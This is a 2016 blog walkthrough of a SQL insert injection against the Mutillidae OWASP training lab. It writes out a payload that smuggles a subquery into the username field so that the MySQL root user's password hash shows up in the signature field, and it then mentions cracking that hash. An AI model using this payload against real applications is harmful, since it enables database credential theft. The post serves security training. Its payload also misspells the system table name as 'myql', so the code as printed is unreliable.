Wednesday, November 2, 2016

Mutillidae OWASP Top 10: A1 Injection - SQLi Insert Injection

Head over to:
OWASP Top 10 > A1 Injection > SQLi - Insert Injection > Register 

This page is vulnerable to 2 types of attacks. An SQL insert injection attack and a cross-site scripting (XSS) attack. We will look at the latter in the coming articles. 

As usual, lets create errors by using an apostrophe( ' ).

Looks like a very simple SQL INSERT query. The page inserts the 'username', 'password' and 'mysignature' into the accounts table. The same table from which we dumped data here

The idea behind this type of an attack, is to insert a 'sub-query' within the main insert query. And the results will be shown in any message box or text field that the page pops to confirm a successful entry or in any other places that display the related information from the database. 

The most basic example for this is the green text box above the form tells us that the account is created:

We can also retrieve the user information from the user-info.php page. Where the username, password and signature can be retrieved with correct credentials. 

  • The green text box cannot be used for retrieving our sub-query results because it only displays the username field which doesn't give us much room to probe as the first quote(') for the input value is part of the insert query.

  • The password field can also not be used for the sub-query because we will need it to successfully retrieve user info from the user-info page. 
  • Which leaves us with only the signature field. This is an ideal field because it will be shown back to us upon submitting valid credentials at the user-info.php page. 

Lets try to retrieve the password for the mysql "root" user.

Currently, the query looks like this:

INSERT INTO accounts (username, password, mysignature) VALUES ('",",")
Note: 3 quotes after 'values' is because with put an apostrophe to create an error

Sub-query to retrieve mysql's root user password:

SELECT password FROM mysql.user WHERE user="root"
This is our subquery to retrieve mysql root user password

Sub-query into main query

INSERT INTO accounts (username, password, mysignature) VALUES ('x','x',(select password from myql.user where user="root")) -- 

Break down:
  • VALUES ('x','x', - this is the username and password. 
  • followed by subquery
  • ) -- - closes the statement and comments out everything after it. 
Our malicious string

x','x',(select password from myql.user where user="root")) --

Attack: Insert malicious string into username textbox

Confirm successful entry

Head over over to:
OWASP Top 10 - A1 Injection - SQLi Extract Data - User Info

Enter your newly created account with username=x and password=x

The signature is an MD5 hash of the root user's password. 

To be able to use the password hash, you first need to crack the password to get it in clear-text. 

Please note: the mysql.root user password is very different from the passwords we had dumped earlier from this page. The root user password unlocks more doors for you.

-Jayesh Kerai (@secjay)

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.